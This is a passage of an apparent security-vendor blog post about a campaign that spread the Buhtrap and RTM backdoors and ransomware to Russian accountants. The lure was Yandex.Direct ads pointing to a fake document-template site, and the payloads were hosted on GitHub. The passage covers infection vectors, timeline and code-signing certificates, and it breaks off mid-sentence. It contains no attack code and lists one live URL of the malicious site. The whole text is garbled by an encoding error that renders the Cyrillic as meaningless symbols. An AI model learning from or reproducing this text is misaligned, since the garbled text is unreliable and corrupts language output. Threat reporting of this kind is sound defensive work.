Бэкдор ΠΈ ΡˆΠΈΡ„Ρ€Π°Ρ‚ΠΎΡ€ Buhtrap Ρ€Π°ΡΠΏΡ€ΠΎΡΡ‚Ρ€Π°Π½ΡΠ»ΠΈΡΡŒ с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ ЯндСкс.Π”ΠΈΡ€Π΅ΠΊΡ‚

Π§Ρ‚ΠΎΠ±Ρ‹ Π½Π°Ρ†Π΅Π»ΠΈΡ‚ΡŒ ΠΊΠΈΠ±Π΅Ρ€Π°Ρ‚Π°ΠΊΡƒ Π½Π° Π±ΡƒΡ…Π³Π°Π»Ρ‚Π΅Ρ€ΠΎΠ², ΠΌΠΎΠΆΠ½ΠΎ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒ Ρ€Π°Π±ΠΎΡ‡ΠΈΠ΅ Π΄ΠΎΠΊΡƒΠΌΠ΅Π½Ρ‚Ρ‹, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ ΠΎΠ½ΠΈ ΠΈΡ‰ΡƒΡ‚ Π² сСти. ΠŸΡ€ΠΈΠΌΠ΅Ρ€Π½ΠΎ Ρ‚Π°ΠΊ Π² послСдниС нСсколько мСсяцСв дСйствовала ΠΊΠΈΠ±Π΅Ρ€Π³Ρ€ΡƒΠΏΠΏΠ°, Ρ€Π°ΡΠΏΡ€ΠΎΡΡ‚Ρ€Π°Π½ΡΡŽΡ‰Π°Ρ извСстныС бэкдоры Buhtrap ΠΈ RTM, Π° Ρ‚Π°ΠΊΠΆΠ΅ ΡˆΠΈΡ„Ρ€Π°Ρ‚ΠΎΡ€Ρ‹ ΠΈ ПО для ΠΊΡ€Π°ΠΆΠΈ ΠΊΡ€ΠΈΠΏΡ‚ΠΎΠ²Π°Π»ΡŽΡ‚. Π‘ΠΎΠ»ΡŒΡˆΠΈΠ½ΡΡ‚Π²ΠΎ Ρ†Π΅Π»Π΅ΠΉ располоТСны Π² России. Атака Ρ€Π΅Π°Π»ΠΈΠ·ΠΎΠ²Π°Π½Π° ΠΏΡƒΡ‚Π΅ΠΌ размСщСния врСдоносной Ρ€Π΅ΠΊΠ»Π°ΠΌΡ‹ Π² ЯндСкс.Π”ΠΈΡ€Π΅ΠΊΡ‚. ΠŸΠΎΡ‚Π΅Π½Ρ†ΠΈΠ°Π»ΡŒΠ½Ρ‹Π΅ ΠΆΠ΅Ρ€Ρ‚Π²Ρ‹ ΠΏΠ΅Ρ€Π΅Ρ…ΠΎΠ΄ΠΈΠ»ΠΈ Π½Π° сайт, Π³Π΄Π΅ ΠΈΠΌ ΠΏΡ€Π΅Π΄Π»Π°Π³Π°Π»ΠΎΡΡŒ ΡΠΊΠ°Ρ‡Π°Ρ‚ΡŒ врСдоносный Ρ„Π°ΠΉΠ», замаскированный ΠΏΠΎΠ΄ шаблон Π΄ΠΎΠΊΡƒΠΌΠ΅Π½Ρ‚Π°. ЯндСкс ΡƒΠ΄Π°Π»ΠΈΠ» Π²Ρ€Π΅Π΄ΠΎΠ½ΠΎΡΠ½ΡƒΡŽ Ρ€Π΅ΠΊΠ»Π°ΠΌΡƒ послС нашСго прСдупрСТдСния.

Π˜ΡΡ…ΠΎΠ΄Π½Ρ‹ΠΉ ΠΊΠΎΠ΄ Buhtrap Π² ΠΏΡ€ΠΎΡˆΠ»ΠΎΠΌ Π±Ρ‹Π» слит Π² ΡΠ΅Ρ‚ΡŒ, поэтому Π΅Π³ΠΎ ΠΌΠΎΠΆΠ΅Ρ‚ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒ ΠΊΡ‚ΠΎ ΡƒΠ³ΠΎΠ΄Π½ΠΎ. ΠœΡ‹ Π½Π΅ располагаСм ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠ΅ΠΉ ΠΎΡ‚Π½ΠΎΡΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎ доступности ΠΊΠΎΠ΄Π° RTM.

Π’ постС расскаТСм, ΠΊΠ°ΠΊ Π°Ρ‚Π°ΠΊΡƒΡŽΡ‰ΠΈΠ΅ распространяли врСдоносноС ПО с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ ЯндСкс.Π”ΠΈΡ€Π΅ΠΊΡ‚ ΠΈ хостили Π΅Π³ΠΎ Π½Π° GitHub. Π—Π°Π²Π΅Ρ€ΡˆΠΈΡ‚ пост тСхничСский Π°Π½Π°Π»ΠΈΠ· ΠΌΠ°Π»Π²Π°Ρ€ΠΈ.

Бэкдор ΠΈ ΡˆΠΈΡ„Ρ€Π°Ρ‚ΠΎΡ€ Buhtrap Ρ€Π°ΡΠΏΡ€ΠΎΡΡ‚Ρ€Π°Π½ΡΠ»ΠΈΡΡŒ с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ ЯндСкс.Π”ΠΈΡ€Π΅ΠΊΡ‚

Buhtrap и RTM снова в дСлС

ΠœΠ΅Ρ…Π°Π½ΠΈΠ·ΠΌ распространСния ΠΈ ΠΆΠ΅Ρ€Ρ‚Π²Ρ‹

Π Π°Π·Π»ΠΈΡ‡Π½ΡƒΡŽ ΠΏΠΎΠ»Π΅Π·Π½ΡƒΡŽ Π½Π°Π³Ρ€ΡƒΠ·ΠΊΡƒ, Π΄ΠΎΡΡ‚Π°Π²Π»ΡΠ΅ΠΌΡƒΡŽ ΠΆΠ΅Ρ€Ρ‚Π²Π°ΠΌ, ΠΎΠ±ΡŠΠ΅Π΄ΠΈΠ½ΡΠ΅Ρ‚ ΠΎΠ±Ρ‰ΠΈΠΉ ΠΌΠ΅Ρ…Π°Π½ΠΈΠ·ΠΌ распространСния. ВсС созданныС Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΠ°ΠΌΠΈ врСдоносныС Ρ„Π°ΠΉΠ»Ρ‹ Ρ€Π°Π·ΠΌΠ΅Ρ‰Π°Π»ΠΈΡΡŒ Π² Π΄Π²ΡƒΡ… Ρ€Π°Π·Π½Ρ‹Ρ… рСпозиториях GitHub.

ΠžΠ±Ρ‹Ρ‡Π½ΠΎ Π² Ρ€Π΅ΠΏΠΎΠ·ΠΈΡ‚ΠΎΡ€ΠΈΠΈ находился ΠΎΠ΄ΠΈΠ½ скачиваСмый врСдоносный Ρ„Π°ΠΉΠ», ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ часто мСнялся. ΠŸΠΎΡΠΊΠΎΠ»ΡŒΠΊΡƒ Π½Π° GitHub ΠΌΠΎΠΆΠ½ΠΎ ΠΏΠΎΡΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ ΠΈΡΡ‚ΠΎΡ€ΠΈΡŽ ΠΈΠ·ΠΌΠ΅Π½Π΅Π½ΠΈΠΉ рСпозитория, ΠΌΡ‹ Π²ΠΈΠ΄ΠΈΠΌ, какая врСдоносная ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ° Ρ€Π°ΡΠΏΡ€ΠΎΡΡ‚Ρ€Π°Π½ΡΠ»Π°ΡΡŒ Π² ΠΎΠΏΡ€Π΅Π΄Π΅Π»Π΅Π½Π½Ρ‹ΠΉ ΠΏΠ΅Ρ€ΠΈΠΎΠ΄. Π§Ρ‚ΠΎΠ±Ρ‹ ΡƒΠ±Π΅Π΄ΠΈΡ‚ΡŒ ΠΆΠ΅Ρ€Ρ‚Π²Ρƒ ΡΠΊΠ°Ρ‡Π°Ρ‚ΡŒ врСдоносный Ρ„Π°ΠΉΠ», использовался сайт blanki-shabloni24[.]ru, ΠΏΠΎΠΊΠ°Π·Π°Π½Π½Ρ‹ΠΉ Π½Π° рисункС Π²Ρ‹ΡˆΠ΅.

Π”ΠΈΠ·Π°ΠΉΠ½ сайта ΠΈ всС названия врСдоносных Ρ„Π°ΠΉΠ»ΠΎΠ² Π²Ρ‹Π΄Π΅Ρ€ΠΆΠ°Π½Ρ‹ Π² Π΅Π΄ΠΈΠ½ΠΎΠΉ ΠΊΠΎΠ½Ρ†Π΅ΠΏΡ†ΠΈΠΈ – Π±Π»Π°Π½ΠΊΠΈ, ΡˆΠ°Π±Π»ΠΎΠ½Ρ‹, Π΄ΠΎΠ³ΠΎΠ²ΠΎΡ€Ρ‹, ΠΎΠ±Ρ€Π°Π·Ρ†Ρ‹ ΠΈ ΠΏΡ€. Если ΡƒΡ‡Π΅ΡΡ‚ΡŒ, Ρ‡Ρ‚ΠΎ Π² ΠΏΡ€ΠΎΡˆΠ»ΠΎΠΌ ПО Buhtrap ΠΈ RTM ΡƒΠΆΠ΅ использовалось Π² Π°Ρ‚Π°ΠΊΠ°Ρ… Π½Π° Π±ΡƒΡ…Π³Π°Π»Ρ‚Π΅Ρ€ΠΎΠ², ΠΌΡ‹ ΠΏΡ€Π΅Π΄ΠΏΠΎΠ»ΠΎΠΆΠΈΠ»ΠΈ, Ρ‡Ρ‚ΠΎ Π² Π½ΠΎΠ²ΠΎΠΉ ΠΊΠ°ΠΌΠΏΠ°Π½ΠΈΠΈ стратСгия Ρ‚Π° ΠΆΠ΅. Вопрос Ρ‚ΠΎΠ»ΡŒΠΊΠΎ Π² Ρ‚ΠΎΠΌ, ΠΊΠ°ΠΊ ΠΆΠ΅Ρ€Ρ‚Π²Π° ΠΏΠΎΠΏΠ°Π΄Π°Π»Π° Π½Π° сайт Π°Ρ‚Π°ΠΊΡƒΡŽΡ‰ΠΈΡ….

Π—Π°Ρ€Π°ΠΆΠ΅Π½ΠΈΠ΅

Как ΠΌΠΈΠ½ΠΈΠΌΡƒΠΌ нСсколько ΠΏΠΎΡ‚Π΅Π½Ρ†ΠΈΠ°Π»ΡŒΠ½Ρ‹Ρ… ΠΆΠ΅Ρ€Ρ‚Π², ΠΎΠΊΠ°Π·Π°Π²ΡˆΠΈΡ…ΡΡ Π½Π° этом сайтС, Π±Ρ‹Π»ΠΈ ΠΏΡ€ΠΈΠ²Π»Π΅Ρ‡Π΅Π½Ρ‹ врСдоносной Ρ€Π΅ΠΊΠ»Π°ΠΌΠΎΠΉ. НиТС ΠΏΡ€ΠΈΠ²Π΅Π΄Π΅Π½ ΠΏΡ€ΠΈΠΌΠ΅Ρ€ URL:

https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=ΡΠΊΠ°Ρ‡Π°Ρ‚ΡŒ Π±Π»Π°Π½ΠΊ счСта&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456

Как ΠΌΠΎΠΆΠ½ΠΎ Π²ΠΈΠ΄Π΅Ρ‚ΡŒ ΠΏΠΎ ссылкС, Π±Π°Π½Π½Π΅Ρ€ Π±Ρ‹Π» Ρ€Π°Π·ΠΌΠ΅Ρ‰Π΅Π½ Π½Π° Π»Π΅Π³ΠΈΡ‚ΠΈΠΌΠ½ΠΎΠΌ бухгалтСрском Ρ„ΠΎΡ€ΡƒΠΌΠ΅ bb.f2[.]kz. Π’Π°ΠΆΠ½ΠΎ ΠΎΡ‚ΠΌΠ΅Ρ‚ΠΈΡ‚ΡŒ, Ρ‡Ρ‚ΠΎ Π±Π°Π½Π½Π΅Ρ€Ρ‹ появлялись Π½Π° Ρ€Π°Π·Π½Ρ‹Ρ… сайтах, Ρƒ всСх Π±Ρ‹Π» ΠΎΠ΄ΠΈΠ½ ΠΈ Ρ‚ΠΎΡ‚ ΠΆΠ΅ id ΠΊΠ°ΠΌΠΏΠ°Π½ΠΈΠΈ (blanki_rsya), ΠΈ Π±ΠΎΠ»ΡŒΡˆΠΈΠ½ΡΡ‚Π²ΠΎ ΠΎΡ‚Π½ΠΎΡΠΈΠ»ΠΎΡΡŒ ΠΊ сСрвисам Π±ΡƒΡ…ΡƒΡ‡Π΅Ρ‚Π° ΠΈΠ»ΠΈ ΡŽΡ€ΠΈΠ΄ΠΈΡ‡Π΅ΡΠΊΠΎΠΉ ΠΏΠΎΠΌΠΎΡ‰ΠΈ. Из URL Π²ΠΈΠ΄Π½ΠΎ, Ρ‡Ρ‚ΠΎ ΠΏΠΎΡ‚Π΅Π½Ρ†ΠΈΠ°Π»ΡŒΠ½Π°Ρ ΠΆΠ΅Ρ€Ρ‚Π²Π° использовала запрос Β«ΡΠΊΠ°Ρ‡Π°Ρ‚ΡŒ Π±Π»Π°Π½ΠΊ счСта», Ρ‡Ρ‚ΠΎ подкрСпляСт Π½Π°ΡˆΡƒ Π³ΠΈΠΏΠΎΡ‚Π΅Π·Ρƒ ΠΎ Ρ†Π΅Π»Π΅Π²Ρ‹Ρ… Π°Ρ‚Π°ΠΊΠ°Ρ…. НиТС пСрСчислСны сайты, Π½Π° ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Ρ… появлялись Π±Π°Π½Π½Π΅Ρ€Ρ‹ ΠΈ ΡΠΎΠΎΡ‚Π²Π΅Ρ‚ΡΡ‚Π²ΡƒΡŽΡ‰ΠΈΠ΅ поисковыС запросы.

  • ΡΠΊΠ°Ρ‡Π°Ρ‚ΡŒ Π±Π»Π°Π½ΠΊ счСта β€” bb.f2[.]kz
  • ΠΎΠ±Ρ€Π°Π·Π΅Ρ† Π΄ΠΎΠ³ΠΎΠ²ΠΎΡ€Π° β€” Ipopen[.]ru
  • заявлСниС ΠΆΠ°Π»ΠΎΠ±Π° ΠΎΠ±Ρ€Π°Π·Π΅Ρ† β€” 77metrov[.]ru
  • Π±Π»Π°Π½ΠΊ Π΄ΠΎΠ³ΠΎΠ²ΠΎΡ€Π° β€” blank-dogovor-kupli-prodazhi[.]ru
  • судСбноС ходатайство ΠΎΠ±Ρ€Π°Π·Π΅Ρ† β€” zen.yandex[.]ru
  • ΠΎΠ±Ρ€Π°Π·Π΅Ρ† ΠΆΠ°Π»ΠΎΠ±Ρ‹ β€” yurday[.]ru
  • ΠΎΠ±Ρ€Π°Π·Ρ†Ρ‹ Π±Π»Π°Π½ΠΊΠΎΠ² Π΄ΠΎΠ³ΠΎΠ²ΠΎΡ€ΠΎΠ² β€” Regforum[.]ru
  • Π±Π»Π°Π½ΠΊ Π΄ΠΎΠ³ΠΎΠ²ΠΎΡ€Π° β€” assistentus[.]ru
  • ΠΎΠ±Ρ€Π°Π·Π΅Ρ† Π΄ΠΎΠ³ΠΎΠ²ΠΎΡ€Π° ΠΊΠ²Π°Ρ€Ρ‚ΠΈΡ€Ρ‹ β€” napravah[.]com
  • ΠΎΠ±Ρ€Π°Π·Ρ†Ρ‹ ΡŽΡ€ΠΈΠ΄ΠΈΡ‡Π΅ΡΠΊΠΈΡ… Π΄ΠΎΠ³ΠΎΠ²ΠΎΡ€ΠΎΠ² β€” avito[.]ru

Π‘Π°ΠΉΡ‚ blanki-shabloni24[.]ru, Π²ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎ, Π±Ρ‹Π» настроСн Ρ‚Π°ΠΊ, Ρ‡Ρ‚ΠΎΠ±Ρ‹ ΠΏΡ€ΠΎΠΉΡ‚ΠΈ ΠΏΡ€ΠΎΡΡ‚ΡƒΡŽ Π²ΠΈΠ·ΡƒΠ°Π»ΡŒΠ½ΡƒΡŽ ΠΎΡ†Π΅Π½ΠΊΡƒ. Как ΠΏΡ€Π°Π²ΠΈΠ»ΠΎ, Ρ€Π΅ΠΊΠ»Π°ΠΌΠ°, вСдущая Π½Π° ΠΏΡ€ΠΎΡ„Π΅ΡΡΠΈΠΎΠ½Π°Π»ΡŒΠ½ΠΎ выглядящий сайт со ссылкой Π½Π° GitHub, Π½Π΅ выглядит Ρ‡Π΅ΠΌ-Ρ‚ΠΎ ΠΎΡ‡Π΅Π²ΠΈΠ΄Π½ΠΎ ΠΏΠ»ΠΎΡ…ΠΈΠΌ. ΠšΡ€ΠΎΠΌΠ΅ Ρ‚ΠΎΠ³ΠΎ, Π°Ρ‚Π°ΠΊΡƒΡŽΡ‰ΠΈΠ΅ Π²Ρ‹ΠΊΠ»Π°Π΄Ρ‹Π²Π°Π»ΠΈ врСдоносныС Ρ„Π°ΠΉΠ»Ρ‹ Π² Ρ€Π΅ΠΏΠΎΠ·ΠΈΡ‚ΠΎΡ€ΠΈΠΉ Ρ‚ΠΎΠ»ΡŒΠΊΠΎ Π½Π° ΠΎΠ³Ρ€Π°Π½ΠΈΡ‡Π΅Π½Π½Ρ‹ΠΉ ΠΏΠ΅Ρ€ΠΈΠΎΠ΄, вСроятно, Π½Π° врСмя провСдСния ΠΊΠ°ΠΌΠΏΠ°Π½ΠΈΠΈ. Π‘ΠΎΠ»ΡŒΡˆΡƒΡŽ Ρ‡Π°ΡΡ‚ΡŒ Π² Ρ€Π΅ΠΏΠΎΠ·ΠΈΡ‚ΠΎΡ€ΠΈΠΈ Π½Π° GitHub Π»Π΅ΠΆΠ°Π» пустой Π°Ρ€Ρ…ΠΈΠ² zip ΠΈΠ»ΠΈ чистый Ρ„Π°ΠΉΠ» Π΅Ρ…Π΅. Π’Π°ΠΊΠΈΠΌ ΠΎΠ±Ρ€Π°Π·ΠΎΠΌ, Π°Ρ‚Π°ΠΊΡƒΡŽΡ‰ΠΈΠ΅ ΠΌΠΎΠ³Π»ΠΈ Ρ€Π°ΡΠΏΡ€ΠΎΡΡ‚Ρ€Π°Π½ΡΡ‚ΡŒ Ρ€Π΅ΠΊΠ»Π°ΠΌΡƒ Ρ‡Π΅Ρ€Π΅Π· ЯндСкс.Π”ΠΈΡ€Π΅ΠΊΡ‚ Π½Π° сайтах, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ с большой Π΄ΠΎΠ»Π΅ΠΉ вСроятности ΠΏΠΎΡΠ΅Ρ‰Π°Π»ΠΈΡΡŒ Π±ΡƒΡ…Π³Π°Π»Ρ‚Π΅Ρ€Π°ΠΌΠΈ, ΠΏΡ€ΠΈΡ…ΠΎΠ΄ΠΈΠ²ΡˆΠΈΠΌΠΈ ΠΏΠΎ ΠΊΠΎΠ½ΠΊΡ€Π΅Ρ‚Π½Ρ‹ΠΌ поисковым запросам.

Π”Π°Π»ΡŒΡˆΠ΅ рассмотрим Ρ€Π°Π·Π»ΠΈΡ‡Π½ΡƒΡŽ ΠΏΠΎΠ»Π΅Π·Π½ΡƒΡŽ Π½Π°Π³Ρ€ΡƒΠ·ΠΊΡƒ, Ρ€Π°ΡΠΏΡ€ΠΎΡΡ‚Ρ€Π°Π½ΡΠ²ΡˆΡƒΡŽΡΡ Ρ‚Π°ΠΊΠΈΠΌ ΠΎΠ±Ρ€Π°Π·ΠΎΠΌ.

Анализ ΠΏΠΎΠ»Π΅Π·Π½ΠΎΠΉ Π½Π°Π³Ρ€ΡƒΠ·ΠΊΠΈ

Π₯ронология распространСния

ВрСдоносная кампания Π½Π°Ρ‡Π°Π»Π°ΡΡŒ Π² ΠΊΠΎΠ½Ρ†Π΅ октября 2018 Π³ΠΎΠ΄Π° ΠΈ Π°ΠΊΡ‚ΠΈΠ²Π½Π° Π½Π° ΠΌΠΎΠΌΠ΅Π½Ρ‚ написания поста. ΠŸΠΎΡΠΊΠΎΠ»ΡŒΠΊΡƒ вСсь Ρ€Π΅ΠΏΠΎΠ·ΠΈΡ‚ΠΎΡ€ΠΈΠΉ Π±Ρ‹Π» Π² ΠΎΡ‚ΠΊΡ€Ρ‹Ρ‚ΠΎΠΌ доступС Π½Π° GitHub, ΠΌΡ‹ составили Ρ‚ΠΎΡ‡Π½ΡƒΡŽ Ρ…Ρ€ΠΎΠ½ΠΎΠ»ΠΎΠ³ΠΈΡŽ распространСния ΡˆΠ΅ΡΡ‚ΠΈ Ρ€Π°Π·Π»ΠΈΡ‡Π½Ρ‹Ρ… сСмСйств врСдоносного ПО (см. рисунок Π½ΠΈΠΆΠ΅). ΠœΡ‹ Π΄ΠΎΠ±Π°Π²ΠΈΠ»ΠΈ строку, ΠΏΠΎΠΊΠ°Π·Ρ‹Π²Π°ΡŽΡ‰ΡƒΡŽ ΠΌΠΎΠΌΠ΅Π½Ρ‚ обнаруТСния ссылки Π½Π° Π±Π°Π½Π½Π΅Ρ€, согласно Ρ‚Π΅Π»Π΅ΠΌΠ΅Ρ‚Ρ€ΠΈΠΈ ESET, для сравнСния с историСй git. Как Π²ΠΈΠ΄ΠΈΡ‚Π΅, это Ρ…ΠΎΡ€ΠΎΡˆΠΎ ΠΊΠΎΡ€Ρ€Π΅Π»ΠΈΡ€ΡƒΠ΅Ρ‚ с Π΄ΠΎΡΡ‚ΡƒΠΏΠ½ΠΎΡΡ‚ΡŒΡŽ ΠΏΠΎΠ»Π΅Π·Π½ΠΎΠΉ Π½Π°Π³Ρ€ΡƒΠ·ΠΊΠΈ Π½Π° GitHub. РасхоТдСниС Π² ΠΊΠΎΠ½Ρ†Π΅ фСвраля ΠΌΠΎΠΆΠ½ΠΎ ΠΎΠ±ΡŠΡΡΠ½ΠΈΡ‚ΡŒ отсутствиСм Ρƒ нас части истории ΠΈΠ·ΠΌΠ΅Π½Π΅Π½ΠΈΠΉ, ΠΏΠΎΡΠΊΠΎΠ»ΡŒΠΊΡƒ Ρ€Π΅ΠΏΠΎΠ·ΠΈΡ‚ΠΎΡ€ΠΈΠΉ Π±Ρ‹Π» ΡƒΠ΄Π°Π»Π΅Π½ с GitHub ΠΏΡ€Π΅ΠΆΠ΄Π΅, Ρ‡Π΅ΠΌ ΠΌΡ‹ смогли Π΅Π³ΠΎ ΠΏΠΎΠ»ΡƒΡ‡ΠΈΡ‚ΡŒ ΠΏΠΎΠ»Π½ΠΎΡΡ‚ΡŒΡŽ.

Бэкдор ΠΈ ΡˆΠΈΡ„Ρ€Π°Ρ‚ΠΎΡ€ Buhtrap Ρ€Π°ΡΠΏΡ€ΠΎΡΡ‚Ρ€Π°Π½ΡΠ»ΠΈΡΡŒ с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ ЯндСкс.Π”ΠΈΡ€Π΅ΠΊΡ‚
Рисунок 1. Π₯ронология распространСния ΠΌΠ°Π»Π²Π°Ρ€ΠΈ.

Π‘Π΅Ρ€Ρ‚ΠΈΡ„ΠΈΠΊΠ°Ρ‚Ρ‹ для подписывания ΠΊΠΎΠ΄Π°

Π’ ΠΊΠ°ΠΌΠΏΠ°Π½ΠΈΠΈ использовалось мноТСство сСртификатов. НСкоторыми подписывали большС ΠΎΠ΄Π½ΠΎΠ³ΠΎ сСмСйства врСдоносного ПО, Ρ‡Ρ‚ΠΎ Π΄ΠΎΠΏΠΎΠ»Π½ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎ ΡƒΠΊΠ°Π·Ρ‹Π²Π°Π΅Ρ‚ Π½Π° ΠΏΡ€ΠΈΠ½Π°Π΄Π»Π΅ΠΆΠ½ΠΎΡΡ‚ΡŒ Ρ€Π°Π·Π½Ρ‹Ρ… ΠΎΠ±Ρ€Π°Π·Ρ†ΠΎΠ² ΠΊ ΠΎΠ΄Π½ΠΎΠΉ ΠΊΠ°ΠΌΠΏΠ°Π½ΠΈΠΈ. НСсмотря Π½Π° Π΄ΠΎΡΡ‚ΡƒΠΏΠ½ΠΎΡΡ‚ΡŒ Π·Π°ΠΊΡ€Ρ‹Ρ‚ΠΎΠ³ΠΎ ΠΊΠ»ΡŽΡ‡Π°, ΠΎΠΏΠ΅Ρ€Π°Ρ‚ΠΎΡ€Ρ‹ Π½Π΅ подписывали Π±ΠΈΠ½Π°Ρ€Π½Ρ‹Π΅ Ρ„Π°ΠΉΠ»Ρ‹ систСматичСски ΠΈ использовали ΠΊΠ»ΡŽΡ‡ Π½Π΅ для всСх ΠΎΠ±Ρ€Π°Π·Ρ†ΠΎΠ². Π’ ΠΊΠΎΠ½Ρ†Π΅ фСвраля 2019 Π³ΠΎΠ΄Π° Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΠΈ Π½Π°Ρ‡Π°Π»ΠΈ ΡΠΎΠ·Π΄Π°Π²Π°Ρ‚ΡŒ Π½Π΅Π΄Π΅ΠΉΡΡ‚Π²ΠΈΡ‚Π΅Π»ΡŒΠ½Ρ‹Π΅ подписи с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ сСртификата, ΠΏΡ€ΠΈΠ½Π°Π΄Π»Π΅ΠΆΠ°Ρ‰Π΅Π³ΠΎ Google, ΠΊ ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠΌΡƒ Ρƒ Π½ΠΈΡ… Π½Π΅Ρ‚ Π·Π°ΠΊΡ€Ρ‹Ρ‚ΠΎΠ³ΠΎ ΠΊΠ»ΡŽΡ‡Π°.

ВсС задСйствованныС Π² ΠΊΠ°ΠΌΠΏΠ°Π½ΠΈΠΈ сСртификаты ΠΈ подписываСмыС ΠΈΠΌΠΈ сСмСйства ΠΌΠ°Π»Π²Π°Ρ€ΠΈ пСрСчислСны Π² Ρ‚Π°Π±Π»ΠΈΡ†Π΅ Π½ΠΈΠΆΠ΅.

Бэкдор ΠΈ ΡˆΠΈΡ„Ρ€Π°Ρ‚ΠΎΡ€ Buhtrap Ρ€Π°ΡΠΏΡ€ΠΎΡΡ‚Ρ€Π°Π½ΡΠ»ΠΈΡΡŒ с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ ЯндСкс.Π”ΠΈΡ€Π΅ΠΊΡ‚

ΠœΡ‹ Ρ‚ΠΎΠΆΠ΅ использовали эти сСртификаты подписи ΠΊΠΎΠ΄Π°, Ρ‡Ρ‚ΠΎΠ±Ρ‹ ΡƒΡΡ‚Π°Π½ΠΎΠ²ΠΈΡ‚ΡŒ связь с Π΄Ρ€ΡƒΠ³ΠΈΠΌΠΈ сСмСйствами врСдоносного ПО. Для Π±ΠΎΠ»ΡŒΡˆΠΈΠ½ΡΡ‚Π²Π° сСртификатов ΠΌΡ‹ Π½Π΅ нашли ΠΎΠ±Ρ€Π°Π·Ρ†ΠΎΠ², ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ Ρ€Π°ΡΠΏΡ€ΠΎΡΡ‚Ρ€Π°Π½ΡΠ»ΠΈΡΡŒ Π±Ρ‹ Π½Π΅ Ρ‡Π΅Ρ€Π΅Π· Ρ€Π΅ΠΏΠΎΠ·ΠΈΡ‚ΠΎΡ€ΠΈΠΉ GitHub. Однако сСртификат TOV β€œMARIYA” использовался для подписи ΠΌΠ°Π»Π²Π°Ρ€ΠΈ, ΠΏΡ€ΠΈΠ½Π°Π΄Π»Π΅ΠΆΠ°Ρ‰Π΅ΠΉ Π±ΠΎΡ‚Π½Π΅Ρ‚Ρƒ Wauchos, Ρ€Π΅ΠΊΠ»Π°ΠΌΠ½ΠΎΠ³ΠΎ ПО ΠΈ ΠΌΠ°ΠΉΠ½Π΅Ρ€ΠΎΠ². ΠœΠ°Π»ΠΎΠ²Π΅Ρ€ΠΎΡΡ‚Π½ΠΎ, Ρ‡Ρ‚ΠΎ это врСдоносноС ПО связано с Π΄Π°Π½Π½ΠΎΠΉ ΠΊΠ°ΠΌΠΏΠ°Π½ΠΈΠ΅ΠΉ. Π‘ΠΊΠΎΡ€Π΅Π΅ всСго, сСртификат Π±Ρ‹Π» ΠΊΡƒΠΏΠ»Π΅Π½ Π² Π΄Π°Ρ€ΠΊΠ½Π΅Ρ‚Π΅.

Win32/Filecoder.Buhtrap

ΠŸΠ΅Ρ€Π²Ρ‹ΠΉ ΠΊΠΎΠΌΠΏΠΎΠ½Π΅Π½Ρ‚, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ ΠΏΡ€ΠΈΠ²Π»Π΅ΠΊ нашС Π²Π½ΠΈΠΌΠ°Π½ΠΈΠ΅ – Π²ΠΏΠ΅Ρ€Π²Ρ‹Π΅ ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠ΅Π½Π½Ρ‹ΠΉ Win32/Filecoder.Buhtrap. Π­Ρ‚ΠΎ Π±ΠΈΠ½Π°Ρ€Π½Ρ‹ΠΉ Ρ„Π°ΠΉΠ» Π½Π° Delphi, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ ΠΈΠ½ΠΎΠ³Π΄Π° Π±Ρ‹Π²Π°Π΅Ρ‚ ΡƒΠΏΠ°ΠΊΠΎΠ²Π°Π½. Π’ основном ΠΎΠ½ распространялся Π² фСвралС–мартС 2019 Π³ΠΎΠ΄Π°. Он Π²Π΅Π΄Π΅Ρ‚ сСбя, ΠΊΠ°ΠΊ ΠΈ ΠΏΠΎΠ»ΠΎΠΆΠ΅Π½ΠΎ ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ΅-Π²Ρ‹ΠΌΠΎΠ³Π°Ρ‚Π΅Π»ΡŽ – ΠΈΡ‰Π΅Ρ‚ Π»ΠΎΠΊΠ°Π»ΡŒΠ½Ρ‹Π΅ диски ΠΈ сСтСвыС ΠΏΠ°ΠΏΠΊΠΈ ΠΈ ΡˆΠΈΡ„Ρ€ΡƒΠ΅Ρ‚ ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠ΅Π½Π½Ρ‹Π΅ Ρ„Π°ΠΉΠ»Ρ‹. Для ΠΊΠΎΠΌΠΏΡ€ΠΎΠΌΠ΅Ρ‚Π°Ρ†ΠΈΠΈ Π΅ΠΌΡƒ Π½Π΅ Π½ΡƒΠΆΠ½ΠΎ ΠΈΠ½Ρ‚Π΅Ρ€Π½Π΅Ρ‚-ΠΏΠΎΠ΄ΠΊΠ»ΡŽΡ‡Π΅Π½ΠΈΠ΅, ΠΏΠΎΡΠΊΠΎΠ»ΡŒΠΊΡƒ ΠΎΠ½ Π½Π΅ связываСтся с сСрвСром для ΠΎΡ‚ΠΏΡ€Π°Π²ΠΊΠΈ 